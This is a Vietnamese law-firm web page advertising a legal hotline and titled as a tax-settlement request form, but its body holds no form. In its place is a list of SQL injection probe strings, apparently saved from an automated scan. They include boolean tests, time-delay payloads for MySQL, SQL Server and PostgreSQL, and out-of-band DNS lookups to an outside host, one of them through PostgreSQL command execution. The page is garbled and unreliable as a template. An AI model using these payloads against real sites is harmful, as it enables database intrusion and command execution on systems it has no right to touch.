Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Mẫu đơn xin quyết toán thuế

Cập nhật lần cuối lúc 18:37 ngày 17/07/2014

1
1
1
1
-1 OR 2+290-290-1=0+0+0+1 --
1'"
-1 OR 3+290-290-1=0+0+0+1 --
-1 OR 3*2<(0+5+290-290) --
-1 OR 3*2>(0+5+290-290) --
-1 OR 2+449-449-1=0+0+0+1
-1 OR 3+449-449-1=0+0+0+1
-1 OR 3*2<(0+5+449-449)
\
1
-1 OR 3*2>(0+5+449-449)
@@iG2ga
-1' OR 2+537-537-1=0+0+0+1 --
JyI=
-1' OR 3+537-537-1=0+0+0+1 --
-1' OR 3*2<(0+5+537-537) --
-1' OR 3*2>(0+5+537-537) --
-1' OR 2+536-536-1=0+0+0+1 or '9L46mls3'='
-1' OR 3+536-536-1=0+0+0+1 or '9L46mls3'='
-1' OR 3*2<(0+5+536-536) or '9L46mls3'='
-1' OR 3*2>(0+5+536-536) or '9L46mls3'='
-1" OR 2+195-195-1=0+0+0+1 --
-1" OR 3+195-195-1=0+0+0+1 --
-1" OR 3*2<(0+5+195-195) --
-1" OR 3*2>(0+5+195-195) --
if(now()=sysdate(),sleep(34.923),0)/*'XOR(if(now()=sysdate(),sleep(34.923),0))OR'"XOR(if(now()=sysdate(),sleep(34.923),0))OR"*/
(select(0)from(select(sleep(11.641)))v)/*'+(select(0)from(select(sleep(11.641)))v)+'"+(select(0)from(select(sleep(11.641)))v)+"*/
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
-1; waitfor delay '0:0:11.641' --
-1); waitfor delay '0:0:11.641' --
-1); waitfor delay '0:0:34.923' --
1 waitfor delay '0:0:23.282' --
OOZj6Uwo'; waitfor delay '0:0:34.923' --
-1;select pg_sleep(23.282); --
-1);select pg_sleep(23.282); --
-1));select pg_sleep(23.282); --
JwSzjEtJ';select pg_sleep(34.923); --
PYoRaQHG');select pg_sleep(11.641); --
B1cVoVfa'));select pg_sleep(11.641); --
kMiqTbft'));select pg_sleep(23.282); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5227.34060.b6917.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5228.34060.b6917.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5231.34060.b6917.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5232.34060.b6917.\1.bxss.me
667'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: